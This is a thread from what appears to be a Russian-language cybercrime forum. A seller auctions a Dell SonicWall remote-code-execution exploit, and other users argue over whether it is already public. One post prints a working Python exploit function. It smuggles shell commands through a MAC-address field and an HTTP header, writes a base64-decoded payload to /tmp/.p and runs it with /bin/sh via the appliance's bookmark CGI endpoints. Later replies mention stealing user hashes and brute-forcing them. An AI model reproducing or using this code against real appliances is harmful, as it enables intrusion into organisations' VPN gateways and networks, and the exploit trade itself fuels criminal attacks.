• XSS.stack #1 – первый литературный журнал от юзеров форума

Dell SonicWall RCE exploit

В этой теме можно использовать автоматический гарант!

chevrolet

pohui
Пользователь
Регистрация
07.02.2022
Сообщения
43
Реакции
15
Аукцион. Делл соникволл рце эксплойт. Пробивает все версии. за пруфами в ПМ.

Старт: 50k$
Шаг: 10k$
Блиц: 100k$


Деп закину без проблем.

Аукцион длится 3 дня!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Деп закину без проблем.
50к закинете?

Работайте только через гаранта!
 
Твои мысли это твои, у меня есть все пруфы, чтобы доказать что это не паблик эксп. Тебе скинули кусок кода и ты сделал вывод, что это паблик? Идиотизм ничего более!
а че ты сразу такой агрессивный, тебе чел сказал что есть мысли и не только у него одного.
а ты возьми и скинь кусок кода чтобы мы могли выводы сделать. (можешь под хайд)
 
Каждый нормальный селлер имея 0 дей на впн пойдет к итегре
итегра купит его за лям (может себе позволить) он не пойдет сюда его продавать
пусть 913 тоже скажет свое мнение он вообще блицнул да купить то похуй мы купим, вопрос только что кота в мешке?
 
без проблем)
Python:
  def BM_RCE(self, sessions, payload):
        add_r = {'bmName': '_BM_RDP_', 'host': '1.1.1.1', 'description': '', 'categories': '', 'service': 'RDPALL', 'screenSize': '4', 'colorSize': '3', 'launchMethod': 'Auto', 'wol': 'on', 'macAddr': '0a:00:27:00:00:01`env|sh`', 'wolTime': '1', 'wolRemote': 'on', 'apppath': '', 'folder': '', 'appcmdline': '', 'clientComputerName': '', 'tsfarmserverlist': '', 'rdpLoadBalanceInfo': '', 'langsel': '1', 'autoreconnection': 'on', 'themes': 'on', 'redirectclipboard': 'on', 'remotecopy': 'on', 'rdpfileshare': 'on', 'displayconnectionbar': 'on', 'bitmapcache': 'on', 'audiomode': '3', 'rdpExperience': '1', 'rdpServerAuthFailAction': '1', 'charset': 'UTF-8', 'sshKeyFile': '', 'sshFontSize': '15', 'kexAlgoList': '0,1,2', 'cipherAlgoList': '', 'hmacAlgoList': '', 'forceInstalledCheckbox': 'on',
                 'icaAddr': '', 'vncEncoding': '0', 'vncCompression': '7', 'vncJpegQuality': '6', 'vncCursorShapeUpdates': '1', 'vncRemotePasteKeys': '1', 'vncUseCopyrect': 'on', 'vncShareDesktop': 'on', 'vncRemoteCopy': 'on', 'ssoEnabled': 'on', 'ssoType': 'sslvpn', 'ssoName': 'admin', 'ssoPass': 'password', 'ssoDomain': '', 'fbaSSOFormUserName': '', 'fbaSSOFormUserPassword': '', 'defaultDomain': '', 'urlHttpsCheckbox': 'on', 'urlCDSSOEnabled': 'on', 'MCForceInApp': 'on', 'MC_App': 'inherit', 'MC_Copy': 'inherit', 'MC_Print': 'inherit', 'MC_Offline': 'inherit', 'swcctn': 'XXX', 'name': '', 'type': 'user', 'owner': 'test', 'cmd': 'add', 'parentBmId': '0', 'ownerdomain': 'XXX', 'serviceManualConfigList': '[{"name":"HTML5","enable":1},{"name":"Native","enable":1}]', 'wantBmData': 'true', 'ok': 'OK'}
        headers = {
            'Command': '$(echo {} | openssl base64 -d > /tmp/.p;/bin/sh /tmp/.p)'.format(payload)}
        print('[+] Attempting to use user level boomark RCE')
        for sess in sessions:
            session = sess.split(' ')
            print('\n [+] Trying session {}'.format(sess[0]))
            print('[+] Adding Bookmark')
            if self.Cookies is None:
                self.Cookies = {'swap': b64encode(sess[0].encode()).decode()}
            if 'swap' in self.Cookies.keys():
                self.Cookies['swap'] = b64encode(sess[0].encode()).decode()
            else:
                self.Cookies.update(
                    {'swap': b64encode(sess[0].encode()).decode()})
            add_r['swcctn'] = sess[4]
            add_r['owner'] = sess[2]
            dom = self.getDomain(sess[2])
           
            if do is None:
                return False
           
            add_r['ownerdomain'] = domain
            add_req = requests.post(self.url+'/cgi-bin/editBookmark?swcctn=' +
                                    sess[4], verify=False, cookies=self.Cookies, data=add_r)
            resp = json_decode(add_req.text)
            if add_req.status_code != 200 or resp is None:
                print('[+] Adding bookmark failed with this session, Moving on')
                print(add_req.status_code)
                print(add_req.text)
                continue
            if resp['status'] != 'success':
                print('[+] Adding failure, Reason: ')
                print(resp)
                continue
            bmId = resp['bmData']['id']
            print('[+] Got boomark ID {}'.format(bmId))
            print('[+] Triggering RCE')
            try:
                rce_r = requests.get(self.url+'/cgi-bin/tscbookmark?method=html&bmId={}&swcctn={}'.format(
                    bmId, sess[4]), cookies=self.Cookies, verify=False, headers=headers,stream=True)
                for data in rce_r.iter_content(chunk_size=58):
                    if str(data).find('Magic packet') != -1:
                        print('[+] Got the magic packet line')
                        print('[+] Finished RCE breaking')
                        rce_r.close()
                        break
                    else:
                        print('[+] Got status line: {}'.format(data))
               
                print('[+] Command sent')
            except Exception as ex:
                ex = str(ex).lower()
                if ex.find('read timed out') != -1:
                    print('[!!] Read timed out, RCE probably succeded')
                else:
                    print(
                        '[-] Unexpected error {} in RCE, Proceeding anyway'.format(ex))
                pass


Скрытый контент для пользователей: .
 
Проще всего решить этот вопрос отдать кому то из модераторов на проверку елси нет денег на депозит, я за себя скажу что публичну извенюсь если это не паблик
 
дабы что бы никто не продавал эту хуиту, в скорем времени может быть выложу ее.
ты внеси ясность это тот что в пабе и так валяеться или другой? просто на сколько мне известно dell sonic wall назывались старые девайсы
 
нет это тот же соник, только более старой версии, только присуствует shell rce, и то там приходится отправлять комманду и по новой вбивать другую комманду, я еще пока не разбирался в нем конкретно в дописании интерактивной - непрерывной shell оболчки.
я понял про что ты говоришь мы по другому по нему работаем тянем хэши юзеров и брутим короче это старое говно сильно, есть еще что отловить конечно но поебаться нужно
тему закрывайте это не 0 дей
 


Напишите ответ...
Верх